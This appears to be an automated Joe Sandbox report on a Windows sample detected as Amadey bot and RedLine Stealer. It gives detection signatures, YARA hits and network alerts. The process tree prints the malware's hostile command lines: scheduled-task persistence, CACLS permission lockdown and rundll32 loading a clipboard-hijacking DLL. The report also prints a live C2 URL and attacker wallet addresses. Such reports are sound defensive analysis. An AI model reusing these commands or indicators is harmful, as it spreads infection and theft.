Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:800983
MD5:f4b906685385629998faa352a94a2e1f
SHA1:97ebb6ba0f496f6cabdec20d5c8af07495a00e15
SHA256:49d5e821c721205ae44d6ef76450b6a1307e06308900065d18ebad11c6abe74f
Tags:exe
Infos:

Detection

Amadey, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Detected unpacking (overwrites its own PE header)
Yara detected Amadey bot
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected Amadeys Clipper DLL
Disable Windows Defender real time protection (registry)
Machine Learning detection for sample
Contains functionality to inject code into remote processes
Uses schtasks.exe or at.exe to add and modify task schedules
Disable Windows Defender notifications (registry)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Uses cacls to modify the permissions of files
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • file.exe (PID: 616 cmdline: C:\Users\user\Desktop\file.exe MD5: F4B906685385629998FAA352A94A2E1F)
    • bPsg.exe (PID: 984 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\bPsg.exe MD5: F0D05D7896B3839E5CFBCC78E4FD87FF)
      • aPsf.exe (PID: 4764 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\aPsf.exe MD5: 5DD55AE0E5CCD8EF2E82679ED0FC11C9)
      • nika.exe (PID: 604 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\nika.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)
    • xriv.exe (PID: 3596 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
      • mnolyk.exe (PID: 6136 cmdline: "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
        • schtasks.exe (PID: 6024 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 6068 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 768 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cacls.exe (PID: 4204 cmdline: CACLS "mnolyk.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cacls.exe (PID: 4812 cmdline: CACLS "mnolyk.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cmd.exe (PID: 3104 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cacls.exe (PID: 5312 cmdline: CACLS "..\4b9a106e76" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cacls.exe (PID: 4012 cmdline: CACLS "..\4b9a106e76" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
        • rundll32.exe (PID: 1248 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • rundll32.exe (PID: 5316 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 4736 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • mnolyk.exe (PID: 4664 cmdline: C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 5432 cmdline: C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 2848 cmdline: C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 5764 cmdline: C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • cleanup
{"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
{"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
        C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            SourceRuleDescriptionAuthorStrings
            00000021.00000002.712917292.00000000001B1000.00000020.00000001.01000000.0000000A.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              00000021.00000000.712317333.00000000001B1000.00000020.00000001.01000000.0000000A.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                0000000F.00000002.776200491.00000000001B1000.00000020.00000001.01000000.0000000A.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  0000000F.00000000.321018621.00000000001B1000.00000020.00000001.01000000.0000000A.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      Click to see the 19 entries
                      SourceRuleDescriptionAuthorStrings
                      2.3.aPsf.exe.690000.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        2.3.aPsf.exe.690000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                        • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                        • 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                        • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                        • 0x1e9d0:$s5: delete[]
                        • 0x1de88:$s6: constructor or from DllMain.
                        0.3.file.exe.475dc20.0.raw.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                          0.3.file.exe.475dc20.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                            2.2.aPsf.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                              Click to see the 18 entries
                              No Sigma rule has matched
                              Timestamp:192.168.2.762.204.41.449808802027700 02/07/23-23:07:30.643129
                              SID:2027700
                              Source Port:49808
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449869802027700 02/07/23-23:07:47.148730
                              SID:2027700
                              Source Port:49869
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450136802027700 02/07/23-23:09:00.282670
                              SID:2027700
                              Source Port:50136
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450427802027700 02/07/23-23:10:16.088952
                              SID:2027700
                              Source Port:50427
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450041802027700 02/07/23-23:08:35.406746
                              SID:2027700
                              Source Port:50041
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450197802027700 02/07/23-23:09:17.360535
                              SID:2027700
                              Source Port:50197
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450332802027700 02/07/23-23:09:52.732684
                              SID:2027700
                              Source Port:50332
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449774802027700 02/07/23-23:07:22.447558
                              SID:2027700
                              Source Port:49774
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450393802027700 02/07/23-23:10:07.593303
                              SID:2027700
                              Source Port:50393
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449713802027700 02/07/23-23:07:06.192941
                              SID:2027700
                              Source Port:49713
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449746802027700 02/07/23-23:07:13.923684
                              SID:2027700
                              Source Port:49746
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450074802027700 02/07/23-23:08:44.559819
                              SID:2027700
                              Source Port:50074
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450270802027700 02/07/23-23:09:37.475504
                              SID:2027700
                              Source Port:50270
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450304802027700 02/07/23-23:09:45.806702
                              SID:2027700
                              Source Port:50304
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450422802027700 02/07/23-23:10:14.657368
                              SID:2027700
                              Source Port:50422
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450013802027700 02/07/23-23:08:27.775982
                              SID:2027700
                              Source Port:50013
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449897802027700 02/07/23-23:07:54.022407
                              SID:2027700
                              Source Port:49897
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450398802027700 02/07/23-23:10:08.813551
                              SID:2027700
                              Source Port:50398
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449779802027700 02/07/23-23:07:23.701655
                              SID:2027700
                              Source Port:49779
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449975802027700 02/07/23-23:08:18.409780
                              SID:2027700
                              Source Port:49975
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450108802027700 02/07/23-23:08:53.335185
                              SID:2027700
                              Source Port:50108
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449970802027700 02/07/23-23:08:15.189928
                              SID:2027700
                              Source Port:49970
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450103802027700 02/07/23-23:08:51.993571
                              SID:2027700
                              Source Port:50103
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449892802027700 02/07/23-23:07:52.780225
                              SID:2027700
                              Source Port:49892
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450079802027700 02/07/23-23:08:45.791597
                              SID:2027700
                              Source Port:50079
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450309802027700 02/07/23-23:09:47.063197
                              SID:2027700
                              Source Port:50309
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450254802027700 02/07/23-23:09:33.517906
                              SID:2027700
                              Source Port:50254
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449852802027700 02/07/23-23:07:42.945716
                              SID:2027700
                              Source Port:49852
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450180802027700 02/07/23-23:09:13.154966
                              SID:2027700
                              Source Port:50180
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449926802027700 02/07/23-23:08:04.026093
                              SID:2027700
                              Source Port:49926
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450287802027700 02/07/23-23:09:41.643242
                              SID:2027700
                              Source Port:50287
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449959802027700 02/07/23-23:08:12.184455
                              SID:2027700
                              Source Port:49959
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450410802027700 02/07/23-23:10:11.734233
                              SID:2027700
                              Source Port:50410
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450226802027700 02/07/23-23:09:24.417895
                              SID:2027700
                              Source Port:50226
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450471802027700 02/07/23-23:10:28.534174
                              SID:2027700
                              Source Port:50471
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450018802027700 02/07/23-23:08:28.986007
                              SID:2027700
                              Source Port:50018
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450152802027700 02/07/23-23:09:04.274600
                              SID:2027700
                              Source Port:50152
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450443802027700 02/07/23-23:10:21.669848
                              SID:2027700
                              Source Port:50443
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450365802027700 02/07/23-23:10:00.817411
                              SID:2027700
                              Source Port:50365
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450282802027700 02/07/23-23:09:40.408974
                              SID:2027700
                              Source Port:50282
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449824802027700 02/07/23-23:07:34.508277
                              SID:2027700
                              Source Port:49824
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449741802027700 02/07/23-23:07:12.972313
                              SID:2027700
                              Source Port:49741
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449954802027700 02/07/23-23:08:10.899376
                              SID:2027700
                              Source Port:49954
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450337802027700 02/07/23-23:09:53.984195
                              SID:2027700
                              Source Port:50337
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449718802027700 02/07/23-23:07:07.389632
                              SID:2027700
                              Source Port:49718
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450046802027700 02/07/23-23:08:37.701237
                              SID:2027700
                              Source Port:50046
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450360802027700 02/07/23-23:09:59.589638
                              SID:2027700
                              Source Port:50360
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450259802027700 02/07/23-23:09:34.780949
                              SID:2027700
                              Source Port:50259
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450124802027700 02/07/23-23:08:57.344638
                              SID:2027700
                              Source Port:50124
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450439802027700 02/07/23-23:10:20.713212
                              SID:2027700
                              Source Port:50439
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449982802027700 02/07/23-23:08:20.169197
                              SID:2027700
                              Source Port:49982
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449921802027700 02/07/23-23:08:02.784331
                              SID:2027700
                              Source Port:49921
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449734802027700 02/07/23-23:07:11.313399
                              SID:2027700
                              Source Port:49734
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450001802027700 02/07/23-23:08:24.834270
                              SID:2027700
                              Source Port:50001
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450157802027700 02/07/23-23:09:05.447048
                              SID:2027700
                              Source Port:50157
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450353802027700 02/07/23-23:09:57.891553
                              SID:2027700
                              Source Port:50353
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449725802027700 02/07/23-23:07:09.061494
                              SID:2027700
                              Source Port:49725
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449790802027700 02/07/23-23:07:26.361222
                              SID:2027700
                              Source Port:49790
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450344802027700 02/07/23-23:09:55.700525
                              SID:2027700
                              Source Port:50344
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450143802027700 02/07/23-23:09:02.035667
                              SID:2027700
                              Source Port:50143
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449781802027700 02/07/23-23:07:24.188556
                              SID:2027700
                              Source Port:49781
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450095802027700 02/07/23-23:08:49.744924
                              SID:2027700
                              Source Port:50095
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449963802027700 02/07/23-23:08:13.161472
                              SID:2027700
                              Source Port:49963
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450115802027700 02/07/23-23:08:55.052783
                              SID:2027700
                              Source Port:50115
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450185802027700 02/07/23-23:09:14.360322
                              SID:2027700
                              Source Port:50185
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449762802027700 02/07/23-23:07:17.827370
                              SID:2027700
                              Source Port:49762
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450381802027700 02/07/23-23:10:04.673244
                              SID:2027700
                              Source Port:50381
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450316802027700 02/07/23-23:09:48.784877
                              SID:2027700
                              Source Port:50316
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450020802027700 02/07/23-23:08:29.489590
                              SID:2027700
                              Source Port:50020
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449938802027700 02/07/23-23:08:06.973604
                              SID:2027700
                              Source Port:49938
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450058802027700 02/07/23-23:08:40.571514
                              SID:2027700
                              Source Port:50058
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450067802027700 02/07/23-23:08:42.809418
                              SID:2027700
                              Source Port:50067
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449880802027700 02/07/23-23:07:49.880282
                              SID:2027700
                              Source Port:49880
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449864802027700 02/07/23-23:07:45.902188
                              SID:2027700
                              Source Port:49864
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450214802027700 02/07/23-23:09:21.511864
                              SID:2027700
                              Source Port:50214
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449947802027700 02/07/23-23:08:09.176994
                              SID:2027700
                              Source Port:49947
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450140802027700 02/07/23-23:09:01.270109
                              SID:2027700
                              Source Port:50140
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450296802027700 02/07/23-23:09:43.846361
                              SID:2027700
                              Source Port:50296
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450131802027700 02/07/23-23:08:59.066086
                              SID:2027700
                              Source Port:50131
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450401802027700 02/07/23-23:10:09.526189
                              SID:2027700
                              Source Port:50401
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450086802027700 02/07/23-23:08:47.567671
                              SID:2027700
                              Source Port:50086
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449919802027700 02/07/23-23:08:02.303851
                              SID:2027700
                              Source Port:49919
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450299802027700 02/07/23-23:09:44.598785
                              SID:2027700
                              Source Port:50299
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450169802027700 02/07/23-23:09:10.009649
                              SID:2027700
                              Source Port:50169
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449991802027700 02/07/23-23:08:22.396521
                              SID:2027700
                              Source Port:49991
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450039802027700 02/07/23-23:08:34.413705
                              SID:2027700
                              Source Port:50039
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450112802027700 02/07/23-23:08:54.333220
                              SID:2027700
                              Source Port:50112
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449966802027700 02/07/23-23:08:13.888624
                              SID:2027700
                              Source Port:49966
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449753802027700 02/07/23-23:07:15.610893
                              SID:2027700
                              Source Port:49753
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449706802027700 02/07/23-23:07:04.472246
                              SID:2027700
                              Source Port:49706
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449836802027700 02/07/23-23:07:38.152613
                              SID:2027700
                              Source Port:49836
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450325802027700 02/07/23-23:09:51.040294
                              SID:2027700
                              Source Port:50325
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450242802027700 02/07/23-23:09:30.589447
                              SID:2027700
                              Source Port:50242
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450455802027700 02/07/23-23:10:24.593085
                              SID:2027700
                              Source Port:50455
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450372802027700 02/07/23-23:10:02.525802
                              SID:2027700
                              Source Port:50372
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449900802027700 02/07/23-23:07:54.774755
                              SID:2027700
                              Source Port:49900
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450323802027700 02/07/23-23:09:50.536075
                              SID:2027700
                              Source Port:50323
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449961802027700 02/07/23-23:08:12.685375
                              SID:2027700
                              Source Port:49961
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
